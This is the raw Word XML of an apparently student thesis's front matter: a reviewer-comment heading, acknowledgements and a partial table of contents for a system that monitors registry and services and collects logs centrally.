      <w:bookmarkStart w:id="11" w:name="_Toc483575479"/>
      <w:bookmarkStart w:id="12" w:name="_Toc483676742"/>
      <w:bookmarkStart w:id="13" w:name="_Toc483834686"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMENT OF REVIEWER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00811A53" w:rsidRDefault="00AF4EA3" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8789"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pP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p>
    <w:p w:rsidR="00C437AB" w:rsidRPr="00E445CE" w:rsidRDefault="00C437AB" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc483575480"/>
      <w:bookmarkStart w:id="15" w:name="_Toc483676743"/>
      <w:bookmarkStart w:id="16" w:name="_Toc483834687"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ACKNOWLEDGEMENT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="00CD556F" w:rsidP="00CD556F">
      <w:r w:rsidRPr="00CD556F">
        <w:t xml:space="preserve">With supports and helps of many individuals, this thesis has become reality. We would like to express our appreciation to all of them. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD556F">
        <w:t>First of all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD556F">
        <w:t>, we would like to thank not only teachers in faculty of computer network and communications but also teachers in University of Information Technology who have taught us very useful lectures with all of their passion, which provide necessary knowledge for us to finish this thesis. Especially</w:t>
      </w:r>
      <w:r w:rsidR="004E2049">
        <w:t>, we would like to express our appreciation to</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD556F">
        <w:t xml:space="preserve"> professor Nguyen Anh Tuan, our instructor, who has inspired and guided us to dive deeply into information security with this thesis. Secondly, we would like to thank our friends who has helped, supported and exchanged knowledge with us since we started studying at University of Information Technology. Finally, we would like to thank our family for supporting us during the time we develop this project.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="000C0B89">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1433631299"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="000C0B89" w:rsidRPr="00E445CE" w:rsidRDefault="00877325" w:rsidP="00877325">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E445CE">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>TABLE OF CONTENTS</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E445CE" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE"/>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="000C0B89">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="878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84962976" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 1.</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962976 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962977" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Motivation</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962977 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962978" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thesis’ statement</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962978 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962979" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Subject</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962979 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962980" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962980 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962981" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The needs of Registry monitoring module</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962981 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962982" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The needs of Service monitoring module</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962982 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962983" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The needs of Distributed Log Collector Hardware</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962983 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962984" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.8</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The needs of Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962984 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962985" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 2.</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
